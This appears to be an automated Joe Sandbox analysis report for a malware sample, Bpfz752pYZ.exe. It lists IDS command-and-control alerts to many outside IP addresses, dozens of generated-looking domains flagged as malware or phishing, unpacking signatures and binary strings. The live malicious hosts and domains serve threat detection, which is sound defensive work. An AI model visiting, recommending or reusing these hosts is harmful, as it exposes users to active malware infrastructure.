2024-11-11T18:13:01.813943+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	58865	23.253.46.64	80	TCP
2024-11-11T18:13:01.832545+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	49712	154.212.231.82	80	TCP
2024-11-11T18:13:02.202308+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	49712	154.212.231.82	80	TCP
2024-11-11T18:13:02.572421+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	58866	99.83.170.3	443	TCP
2024-11-11T18:13:03.080897+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	58867	188.114.96.3	443	TCP
2024-11-11T18:13:03.442545+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	58859	188.114.96.3	80	TCP
2024-11-11T18:13:03.832367+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	58863	199.191.50.83	80	TCP
2024-11-11T18:13:04.769913+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	58868	188.114.96.3	443	TCP
2024-11-11T18:13:05.642224+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	58870	13.248.169.48	80	TCP
2024-11-11T18:13:05.646846+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	58874	3.94.10.34	80	TCP
2024-11-11T18:13:05.769791+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	58871	188.114.96.3	80	TCP
2024-11-11T18:13:06.077941+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	58875	18.208.156.248	80	TCP
2024-11-11T18:13:06.462607+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	58877	103.150.10.48	80	TCP
2024-11-11T18:13:07.771923+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	58877	103.150.10.48	80	TCP
2024-11-11T18:13:08.078083+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	58879	188.114.96.3	443	TCP
2024-11-11T18:13:08.496239+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	58871	188.114.96.3	80	TCP
2024-11-11T18:13:11.604926+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	58899	188.114.96.3	443	TCP
2024-11-11T18:13:12.961856+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	58927	64.225.91.73	80	TCP
2024-11-11T18:13:13.401820+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	62035	44.221.84.105	80	TCP
2024-11-11T18:13:13.403376+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	62034	76.223.67.189	80	TCP
2024-11-11T18:13:13.523144+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	62036	103.224.212.210	80	TCP
2024-11-11T18:13:13.737443+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	62038	103.224.182.252	80	TCP
2024-11-11T18:13:13.807991+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	62037	154.85.183.50	80	TCP
2024-11-11T18:13:14.143551+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	62037	154.85.183.50	80	TCP
2024-11-11T18:13:16.408689+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	61112	64.225.91.73	80	TCP
2024-11-11T18:13:16.641080+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	55436	72.52.179.174	80	TCP
2024-11-11T18:13:17.174275+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	55442	72.52.179.174	80	TCP
2024-11-11T18:13:20.604330+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	52002	52.34.198.229	80	TCP
2024-11-11T18:13:23.313714+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	55368	44.221.84.105	80	TCP
2024-11-11T18:13:24.994411+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	49712	154.212.231.82	80	TCP
2024-11-11T18:13:25.072707+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	63292	99.83.170.3	80	TCP
2024-11-11T18:13:25.108038+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	58859	188.114.96.3	80	TCP
2024-11-11T18:13:25.154690+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	63293	85.17.31.82	80	TCP
2024-11-11T18:13:25.189398+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	49709	208.100.26.245	80	TCP
2024-11-11T18:13:25.196354+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	63294	23.253.46.64	80	TCP
2024-11-11T18:13:25.409596+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	49712	154.212.231.82	80	TCP
2024-11-11T18:13:25.499222+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	49709	208.100.26.245	80	TCP
2024-11-11T18:13:25.524137+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	63298	199.59.243.227	80	TCP
2024-11-11T18:13:25.859716+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	63299	99.83.170.3	443	TCP
2024-11-11T18:13:25.872635+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	63302	85.17.31.82	80	TCP
2024-11-11T18:13:26.150072+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	63305	23.253.46.64	80	TCP
2024-11-11T18:13:26.704377+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	63303	188.114.96.3	443	TCP
2024-11-11T18:13:27.063539+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	58859	188.114.96.3	80	TCP
2024-11-11T18:13:28.835690+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	63317	188.114.96.3	443	TCP
2024-11-11T18:13:29.172224+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	58877	103.150.10.48	80	TCP
2024-11-11T18:13:29.383530+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	58871	188.114.96.3	80	TCP
2024-11-11T18:13:29.751222+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	58877	103.150.10.48	80	TCP
2024-11-11T18:13:31.819056+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	63420	188.114.96.3	443	TCP
2024-11-11T18:13:32.153310+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	58871	188.114.96.3	80	TCP
2024-11-11T18:13:35.478829+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	63440	188.114.96.3	443	TCP
2024-11-11T18:13:36.456276+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	62037	154.85.183.50	80	TCP
2024-11-11T18:13:36.603894+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	63471	103.224.212.210	80	TCP
2024-11-11T18:13:36.688747+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	63472	103.224.182.252	80	TCP
2024-11-11T18:13:37.366861+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	62037	154.85.183.50	80	TCP
2024-11-11T18:13:37.730038+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	63480	3.94.10.34	80	TCP
2024-11-11T18:13:37.730376+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	63482	44.221.84.105	80	TCP
2024-11-11T18:13:37.730377+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	63483	75.2.71.199	80	TCP
2024-11-11T18:13:37.917100+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	63485	18.208.156.248	80	TCP
2024-11-11T18:13:38.055288+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	63484	188.114.97.3	80	TCP
2024-11-11T18:13:38.731382+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	63481	199.191.50.83	80	TCP
2024-11-11T18:13:39.454604+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	63490	75.2.71.199	443	TCP
2024-11-11T18:13:40.398222+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	63493	188.114.97.3	443	TCP
2024-11-11T18:13:41.260279+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	63484	188.114.97.3	80	TCP
2024-11-11T18:13:41.266761+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	63519	85.17.31.82	80	TCP
2024-11-11T18:13:41.278855+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	63518	199.59.243.227	80	TCP
2024-11-11T18:13:41.305552+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	63522	44.221.84.105	80	TCP
2024-11-11T18:13:41.308273+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	63517	23.253.46.64	80	TCP
2024-11-11T18:13:41.312823+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	63521	208.100.26.245	80	TCP
2024-11-11T18:13:41.590924+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	63525	72.52.179.174	80	TCP
2024-11-11T18:13:41.723444+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	63520	154.212.231.82	80	TCP
2024-11-11T18:13:42.148856+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	64177	72.52.179.174	80	TCP
2024-11-11T18:13:44.500644+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	50515	3.94.10.34	80	TCP
2024-11-11T18:13:44.831510+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	50517	199.59.243.227	80	TCP
2024-11-11T18:13:44.831579+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	50518	44.221.84.105	80	TCP
2024-11-11T18:13:44.832038+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	50519	85.17.31.82	80	TCP
2024-11-11T18:13:44.858489+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	50520	44.221.84.105	80	TCP
2024-11-11T18:13:44.886782+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	50521	23.253.46.64	80	TCP
2024-11-11T18:13:44.924237+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	50522	208.100.26.245	80	TCP
2024-11-11T18:13:44.927023+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	50524	75.2.71.199	80	TCP
2024-11-11T18:13:44.928733+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	50525	18.208.156.248	80	TCP
2024-11-11T18:13:45.253290+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	64008	188.114.97.3	80	TCP
2024-11-11T18:13:45.368432+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	50523	154.212.231.82	80	TCP
2024-11-11T18:13:46.150235+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	59137	75.2.71.199	443	TCP
2024-11-11T18:13:46.654538+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	59140	85.17.31.82	80	TCP
2024-11-11T18:13:48.094253+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	59144	199.59.243.227	80	TCP
2024-11-11T18:13:48.095790+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	59148	44.221.84.105	80	TCP
2024-11-11T18:13:48.095867+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	59143	44.221.84.105	80	TCP
2024-11-11T18:13:48.096802+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	59149	75.2.71.199	80	TCP
2024-11-11T18:13:48.122409+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	59150	208.100.26.245	80	TCP
2024-11-11T18:13:48.122414+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	59145	23.253.46.64	80	TCP
2024-11-11T18:13:48.299048+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	59139	199.191.50.83	80	TCP
2024-11-11T18:13:48.356584+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	59146	188.114.97.3	80	TCP
2024-11-11T18:13:48.550901+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	59147	154.212.231.82	80	TCP
2024-11-11T18:13:50.233855+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	59153	85.17.31.82	80	TCP
2024-11-11T18:13:50.251240+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	59155	199.59.243.227	80	TCP
2024-11-11T18:13:50.256494+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	59156	75.2.71.199	80	TCP
2024-11-11T18:13:50.418151+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	59159	44.221.84.105	80	TCP
2024-11-11T18:13:50.418617+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	59161	3.94.10.34	80	TCP
2024-11-11T18:13:50.502916+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	59154	188.114.97.3	80	TCP
2024-11-11T18:13:51.433347+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	59157	199.191.50.83	80	TCP
2024-11-11T18:13:55.167613+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	59173	18.208.156.248	80	TCP
2024-11-11T18:13:56.506333+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	59181	75.2.71.199	80	TCP
2024-11-11T18:14:01.034668+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	56235	23.253.46.64	80	TCP
2024-11-11T18:14:01.034718+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	59179	44.221.84.105	80	TCP
2024-11-11T18:14:01.034785+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	56241	154.212.231.82	80	TCP
2024-11-11T18:14:01.034858+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	59180	188.114.97.3	80	TCP
2024-11-11T18:14:01.034877+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	59178	44.221.84.105	80	TCP
2024-11-11T18:14:01.034911+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	56239	3.94.10.34	80	TCP
2024-11-11T18:14:01.034931+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	56236	199.59.243.227	80	TCP
2024-11-11T18:14:01.034999+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	56237	208.100.26.245	80	TCP
2024-11-11T18:14:01.035022+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	56238	199.191.50.83	80	TCP
2024-11-11T18:14:01.035083+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	56240	18.208.156.248	80	TCP
2024-11-11T18:14:52.861243+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	64560	162.255.119.102	80	TCP
2024-11-11T18:14:53.017386+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	64563	208.100.26.245	80	TCP
2024-11-11T18:14:53.018805+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	64564	75.2.71.199	80	TCP
2024-11-11T18:14:53.430822+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	64565	44.221.84.105	80	TCP
2024-11-11T18:14:53.430947+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	64563	208.100.26.245	80	TCP
2024-11-11T18:14:53.431060+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	64562	188.114.97.3	80	TCP
2024-11-11T18:14:53.431330+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	64567	199.59.243.227	80	TCP
2024-11-11T18:14:53.431341+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	64569	3.94.10.34	80	TCP
2024-11-11T18:14:53.431341+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	64570	18.208.156.248	80	TCP
2024-11-11T18:14:53.431383+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	64568	44.221.84.105	80	TCP
2024-11-11T18:14:53.668671+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	64572	91.195.240.19	80	TCP
2024-11-11T18:14:53.706698+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	64566	154.212.231.82	80	TCP
2024-11-11T18:14:53.962120+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	64573	75.2.71.199	443	TCP
2024-11-11T18:14:54.081011+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	64566	154.212.231.82	80	TCP
2024-11-11T18:14:55.015481+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	64571	199.191.50.83	80	TCP
2024-11-11T18:14:55.048956+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	64574	188.114.97.3	443	TCP
2024-11-11T18:14:55.488395+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	64561	5.79.71.205	80	TCP
2024-11-11T18:14:55.488590+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	64575	188.114.97.3	80	TCP
2024-11-11T18:14:59.550793+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	64576	5.79.71.205	80	TCP
2024-11-11T18:15:00.260759+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	64577	13.248.169.48	80	TCP
2024-11-11T18:15:00.565021+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	64579	3.94.10.34	80	TCP
2024-11-11T18:15:00.697014+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	64580	18.208.156.248	80	TCP
2024-11-11T18:15:00.725808+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	64578	188.114.96.3	80	TCP
2024-11-11T18:15:01.185431+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	64581	103.150.10.48	80	TCP
2024-11-11T18:15:03.585249+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	64584	103.150.10.48	80	TCP
2024-11-11T18:15:04.331530+0100	2804852	1	Malware Command and Control Activity Detected	192.168.2.6	64582	188.114.96.3	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: Bpfz752pYZ.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://puzylyp.com/login.php	Avira URL Cloud: Label: malware
Source: http://vofybic.com/login.php	Avira URL Cloud: Label: malware
Source: http://volyjym.com/login.php	Avira URL Cloud: Label: malware
Source: http://lyryxen.com/login.php	Avira URL Cloud: Label: malware
Source: http://vojyzyt.com/login.php	Avira URL Cloud: Label: malware
Source: http://purymuq.com/login.php	Avira URL Cloud: Label: malware
Source: http://lyxyvyn.com/login.php	Avira URL Cloud: Label: malware
Source: http://vojyjyc.com/login.php	Avira URL Cloud: Label: phishing
Source: http://vopycom.com/login.php	Avira URL Cloud: Label: malware
Source: http://qexynyq.com/login.php	Avira URL Cloud: Label: malware
Source: http://gadykos.com/login.php	Avira URL Cloud: Label: malware
Source: http://qexyfuq.com/login.php	Avira URL Cloud: Label: malware
Source: http://galyvuz.com/login.php	Avira URL Cloud: Label: malware
Source: http://lyryman.com/login.php	Avira URL Cloud: Label: malware
Source: http://vowyrif.com/login.php	Avira URL Cloud: Label: malware
Source: http://lygyxun.com/login.php	Avira URL Cloud: Label: malware
Source: http://ganyzub.com/login.php	Avira URL Cloud: Label: phishing
Source: http://galydyw.com/	Avira URL Cloud: Label: malware
Source: http://lyvysur.com/login.php	Avira URL Cloud: Label: malware
Source: http://qekyhil.com/login.php	Avira URL Cloud: Label: malware
Source: http://qexyvoq.com/login.php	Avira URL Cloud: Label: malware
Source: http://galydyw.com/login.php	Avira URL Cloud: Label: malware
Source: http://vofydac.com/login.php	Avira URL Cloud: Label: malware
Source: http://qetyhyg.com/login.php	Avira URL Cloud: Label: phishing
Source: http://qeqykyv.com/H	Avira URL Cloud: Label: malware
Source: http://gahyvab.com/login.php	Avira URL Cloud: Label: malware
Source: http://lymyner.com/login.php	Avira URL Cloud: Label: malware
Source: http://ganyhus.com/H	Avira URL Cloud: Label: malware
Source: http://lygytyd.com/login.php	Avira URL Cloud: Label: malware
Source: http://pujyteq.com/login.php	Avira URL Cloud: Label: malware
Source: http://pufytip.com/login.php	Avira URL Cloud: Label: malware
Source: http://lysytoj.com/login.php	Avira URL Cloud: Label: malware
Source: http://gatykyh.com/login.php	Avira URL Cloud: Label: malware
Source: http://qedyhyl.com/login.php	Avira URL Cloud: Label: malware
Source: http://pupycuv.com/login.php	Avira URL Cloud: Label: malware
Source: http://pujylog.com/login.php	Avira URL Cloud: Label: malware
Source: http://qetyvil.com/login.php	Avira URL Cloud: Label: malware
Source: http://gadyniw.com/login.php	Avira URL Cloud: Label: malware
Source: http://lysynaj.com/login.php	Avira URL Cloud: Label: malware
Source: http://vopygat.com/login.php	Avira URL Cloud: Label: phishing
Source: http://puzytap.com/login.php	Avira URL Cloud: Label: malware
Source: http://lyxygur.com/login.php	Avira URL Cloud: Label: malware
Source: http://gaqyres.com/login.php	Avira URL Cloud: Label: malware
Source: https://puzylyp.com/login.php	Avira URL Cloud: Label: malware
Source: http://qeqyxyp.com/login.php	Avira URL Cloud: Label: malware
Source: http://lyvynid.com/login.php	Avira URL Cloud: Label: malware
Source: http://qegyfyp.com/login.php	Avira URL Cloud: Label: malware
Source: http://qeqykog.com/login.php	Avira URL Cloud: Label: phishing
Source: http://lysyxar.com/login.php	Avira URL Cloud: Label: malware
Source: http://lygyjuj.com/login.php	Avira URL Cloud: Label: malware
Source: http://lyxygax.com/login.php	Avira URL Cloud: Label: malware
Source: http://qedykiv.com/login.php	Avira URL Cloud: Label: malware
Source: http://pumytup.com/login.php	Avira URL Cloud: Label: malware
Source: http://qedyrag.com/login.php	Avira URL Cloud: Label: malware
Source: http://puzylol.com/login.php	Avira URL Cloud: Label: phishing
Source: http://puvydov.com/login.php	Avira URL Cloud: Label: malware
Source: http://gahyqub.com/login.php	Avira URL Cloud: Label: malware
Source: http://pupywog.com/login.php	Avira URL Cloud: Label: malware
Source: http://pumyxiv.com/login.php	Avira URL Cloud: Label: malware
Source: http://qedyruv.com/login.php	Avira URL Cloud: Label: malware
Source: http://pufyxov.com/login.phpcom/login.php	Avira URL Cloud: Label: phishing
Source: http://volycem.com/login.php	Avira URL Cloud: Label: malware
Source: http://puzyduq.com/login.php	Avira URL Cloud: Label: malware
Source: http://puzydal.com/login.php	Avira URL Cloud: Label: malware
Source: http://galyqaz.com/login.php	Avira URL Cloud: Label: malware
Source: http://lyxysad.com/login.php	Avira URL Cloud: Label: malware
Source: http://gahyzez.com/login.php	Avira URL Cloud: Label: malware
Source: http://vopymyc.com/login.php	Avira URL Cloud: Label: malware
Source: http://puryxag.com/login.php	Avira URL Cloud: Label: malware
Source: http://purywyl.com/login.php	Avira URL Cloud: Label: malware
Source: http://vojycec.com/login.php	Avira URL Cloud: Label: malware
Source: http://gatyfus.com/login.php	Avira URL Cloud: Label: malware
Source: http://pufybyv.com/login.php	Avira URL Cloud: Label: malware
Source: http://ganyfes.com/login.php	Avira URL Cloud: Label: malware
Source: http://lyvyjox.com/login.php	Avira URL Cloud: Label: malware
Source: http://qegytyv.com/login.php	Avira URL Cloud: Label: malware
Source: http://volydot.com/login.php	Avira URL Cloud: Label: phishing
Source: http://galyquw.com/login.php	Avira URL Cloud: Label: malware
Source: http://lykyvod.com/login.php	Avira URL Cloud: Label: malware
Source: http://pujydap.com/login.php	Avira URL Cloud: Label: malware
Source: http://gadyneh.com/login.php	Avira URL Cloud: Label: malware
Source: http://vocydyc.com/login.php	Avira URL Cloud: Label: malware
Source: http://lysyvan.com/login.php	Avira URL Cloud: Label: malware
Source: http://ganyvyw.com/login.php	Avira URL Cloud: Label: malware
Source: http://lyvyxyj.com/login.php	Avira URL Cloud: Label: malware
Source: http://lykywid.com/login.php	Avira URL Cloud: Label: malware
Source: http://qexyhuv.com/login.php	Avira URL Cloud: Label: malware
Source: http://qexylup.com/login.php	Avira URL Cloud: Label: malware
Source: http://pufymyg.com/login.php	Avira URL Cloud: Label: malware
Source: http://pupyteg.com/login.php	Avira URL Cloud: Label: malware
Source: http://qedyfog.com/login.php	Avira URL Cloud: Label: malware
Source: http://vojybef.com/login.php	Avira URL Cloud: Label: malware
Source: http://ganycuh.com/login.php	Avira URL Cloud: Label: malware
Source: http://pufylul.com/login.php	Avira URL Cloud: Label: malware

Multi AV Scanner detection for submitted file

Source: Bpfz752pYZ.exe

ReversingLabs: Detection: 81%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.8% probability

Machine Learning detection for sample

Source: Bpfz752pYZ.exe

Joe Sandbox ML: detected

Compliance

Detected unpacking (creates a PE file in dynamic memory)

Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Unpacked PE file: 6.2.NcYLgtXIKJgHj.exe.1740000.2.unpack
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Unpacked PE file: 7.2.NcYLgtXIKJgHj.exe.3100000.2.unpack
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Unpacked PE file: 10.2.NcYLgtXIKJgHj.exe.1520000.2.unpack
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Unpacked PE file: 22.2.NcYLgtXIKJgHj.exe.2340000.2.unpack
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Unpacked PE file: 34.2.NcYLgtXIKJgHj.exe.2740000.2.unpack

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\Bpfz752pYZ.exe	Unpacked PE file: 0.2.Bpfz752pYZ.exe.400000.2.unpack
Source: C:\Windows\apppatch\svchost.exe	Unpacked PE file: 2.2.svchost.exe.400000.0.unpack

Source: Bpfz752pYZ.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 99.83.170.3:443 -> 192.168.2.6:58866 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:58867 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:58868 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:58879 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:58899 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:63303 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:63317 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:63420 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:63440 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:63493 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 75.2.71.199:443 -> 192.168.2.6:63490 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 75.2.71.199:443 -> 192.168.2.6:59137 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:59138 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:64574 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:64582 version: TLS 1.2

Source:	Binary string: \??\C:\Program Files (x86)\Windows Defender\ganykah.com\??\C:\Program Files (x86)\Windows Defender\wrpcrt4.pdb\??\C:\Program Files (x86)\Windows Defender\winsta.pdb source: svchost.exe, 00000002.00000003.3255347257.0000000003399000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: winsta.pdb source: svchost.exe, 00000002.00000002.3397191515.00000000056A4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wkernel32.pdb source: svchost.exe, 00000002.00000003.3267668085.00000000086BE000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Program Files (x86)\Windows Defender\winsta.pdb source: svchost.exe, 00000002.00000003.3255347257.0000000003399000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: l\wntdll.pdb source: svchost.exe, 00000002.00000002.3383219866.0000000000812000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Program Files (x86)\Windows Defender\wrpcrt4.pdb\??\C:\Program Files (x86)\Windows Defender\winsta.pdb source: svchost.exe, 00000002.00000003.3255347257.0000000003399000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wrpcrt4.pdb source: svchost.exe, 00000002.00000003.3343594271.0000000008626000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Program Files (x86)\Windows Defender\wrpcrt4.pdb\??\C:\Program Files (x86)\Windows Defender\wntdll.pdb source: svchost.exe, 00000002.00000003.3255347257.0000000003399000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: l\winsta.pdb source: svchost.exe, 00000002.00000003.3347345159.000000000338D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: svchost.exe, 00000002.00000002.3402753953.00000000086B9000.00000004.00000020.00020000.00000000.sdmp
